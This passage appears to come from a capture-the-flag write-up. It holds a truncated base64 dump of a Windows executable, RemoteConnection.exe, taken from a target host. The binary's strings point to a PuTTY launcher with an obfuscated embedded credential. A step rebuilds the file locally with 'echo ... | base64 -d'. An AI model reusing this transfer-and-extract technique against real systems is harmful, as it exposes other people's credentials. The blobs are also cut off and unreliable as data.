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QAAkM0AAAAAAAAAAAAACAAAANDNAAHQzQABAM0AAAAAAADBAQAAAAAAAAAAAAP////8AAAAAQAAAAFwzQAAAAAAAAAAAAAEAAABsM0AAQDNAAAAAAABMQEAAAQAAAAAAAAD/////AAAAAEAAAAAkM0AAuSMAALgnAAD6JwAAICgAAFkoAACYKAAA4CgAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAADM////AAAAAP7///8AAAAALB9AAAAAAAD+////AAAAAND///8AAAAA/v///ykhQAA9IUAAAAAAAP7///8AAAAAzP///wAAAAD+////ASRAACokQAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAhyRAAAAAAAD+////AAAAANj///8AAAAA/v///2smQAB+JkAAAAAAADBAQAAAAAAA/////wAAAAAMAAAAjh5AAAAAAABMQEAAAAAAAP////8AAAAADAAAAFAeQAACAAAAeDRAAFw0QAAAAAAAABBAAAAAAACUNEAA/////7AnQAAiBZMZAQAAALA0QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD/////4CdAAP/////oJ0AAAQAAAAAAAAABAAAAAAAAAP/////yJ0AAQAAAAAAAAAAAAAAAIh5AAAIAAAACAAAAAwAAAAEAAAAENUAAIgWTGQUAAADcNEAAAQAAABQ1QAAAAAAAAAAAAAAAAAABAAAA/////wAAAAD/////AAAAAAEAAAAAAAAAAQAAAAAAAABAAAAAAAAAAAAAAACXG0AAQAAAAAAAAAAAAAAAExtAAAIAAAACAAAAAwAAAAEAAABsNUAAAAAAAAAAAAADAAAAAQAAAHw1QAAiBZMZBAAAAEw1QAACAAAAjDVAAAAAAAAAAAAAAAAAAAEAAAD/////QChAACIFkxkBAAAA2DVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAP////+AKEAAAAAAAIgoQAABAAAAkChAACIFkxkDAAAABDZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAP/////AKEAAAAAAAMgoQAABAAAA0ChAAAEAAADYKEAAIgWTGQQAAABANkAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAA/DYAAAAAAAAAAAAAHDgAAAAwAAAEOAAAAAAAAAAAAAA6OAAACDEAAEg3AAAAAAAAAAAAACo6AABMMAAAcDcAAAAAAAAAAAAA9DoAAHQwAAAENwAAAAAAAAAAAADePQAACDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDgAAAAAAADEPQAArj0AAJg9AACIPQAAbj0AAFo9AAA8PQAAID0AAAw9AAD4PAAA4jwAAMQ8AAC8PAAApjwAAJY8AACGPAAAAAAAAII4AACiOAAAwjgAAOQ4AAAqOQAAaDkAAKg5AADqOQAARjgAAAAAAABKOwAAVDsAAFw7AABqOwAAcjsAAH47AACKOwAALDsAAK47AADCOwAAzjsAANg7AADqOwAAADwAABo8AAAuPAAAZDwAAHY8AAAiOwAAGjsAAAw7AAACOwAA5DoAANQ6AADKOgAAwDoAALY6AACUOgAAdDoAAFg6AAA4OgAAmDsAAOw9AAACPgAAOjsAAAw+AAAAAAAAKjgAAAAAAABlAUdldFVzZXJOYW1lVwAAQURWQVBJMzIuZGxsAAAiAVNoZWxsRXhlY3V0ZVcAU0hFTEwzMi5kbGwApwI/Y291dEBzdGRAQDNWPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQDFAQQAAjgI/X1hvdXRfb2ZfcmFuZ2VAc3RkQEBZQVhQQkRAWgCMAj9fWGxlbmd0aF9lcnJvckBzdGRAQFlBWFBCREBaAA0GP3VuY2F1Z2h0X2V4Y2VwdGlvbkBzdGRAQFlBX05YWgDIBT9zcHV0bkA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRV9KUEJEX0pAWgAAUwI/X09zZnhAPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFWFhaAADFBT9zcHV0Y0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUhEQFoAkQM/Zmx1c2hAPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFQUFWMTJAWFoAnAU/c2V0c3RhdGVAPyRiYXNpY19pb3NARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVYSF9OQFoAAE1TVkNQMTAwLmRsbAAADQE/d2hhdEBleGNlcHRpb25Ac3RkQEBVQkVQQkRYWgBdAD8/MWV4Y2VwdGlvbkBzdGRAQFVBRUBYWgAAIgA/PzBleGNlcHRpb25Ac3RkQEBRQUVAQUJRQkRAWgAkAD8/MGV4Y2VwdGlvbkBzdGRAQFFBRUBBQlYwMUBAWgAA0QVtZW1tb3ZlAM0FbWVtY2hyAACiBWlzYWxudW0AZQA/PzNAWUFYUEFYQFoAAGMAPz8yQFlBUEFYSUBaAABNU1ZDUjEwMC5kbGwAAI0EX3VubG9jawBbAV9fZGxsb25leGl0ACMDX2xvY2sAyQNfb25leGl0AMUBX2Ftc2dfZXhpdAAAYwFfX2dldG1haW5hcmdzANwBX2NleGl0AAAqAl9leGl0AC0BX1hjcHRGaWx0ZXIAcwVleGl0AABkAV9faW5pdGVudgCwAl9pbml0dGVybQCxAl9pbml0dGVybV9lAOwBX2NvbmZpZ3RocmVhZGxvY2FsZQCiAV9fc2V0dXNlcm1hdGhlcnIAAOsBX2NvbW1vZGUAAEUCX2Ztb2RlAACfAV9fc2V0X2FwcF90eXBlAAD7AV9jcnRfZGVidWdnZXJfaG9vawAAIQJfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgACAT90ZXJtaW5hdGVAQFlBWFhaAO4AP190eXBlX2luZm9fZHRvcl9pbnRlcm5hbF9tZXRob2RAdHlwZV9pbmZvQEBRQUVYWFoAALgCX2ludm9rZV93YXRzb24AAO8BX2NvbnRyb2xmcF9zAADqAEVuY29kZVBvaW50ZXIAygBEZWNvZGVQb2ludGVyAOwCSW50ZXJsb2NrZWRFeGNoYW5nZQCyBFNsZWVwAOkCSW50ZXJsb2NrZWRDb21wYXJlRXhjaGFuZ2UAANMCSGVhcFNldEluZm9ybWF0aW9uAADABFRlcm1pbmF0ZVByb2Nlc3MAAMABR2V0Q3VycmVudFByb2Nlc3MA0wRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAKUEU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAAADSXNEZWJ1Z2dlclByZXNlbnQApwNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgCTAkdldFRpY2tDb3VudAAAxQFHZXRDdXJyZW50VGhyZWFk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
```

Create the file with: "**echo \[output] | base64 -d > RemoteConnection.exe**"

{% code title="Local Terminal" %}

```bash
echo "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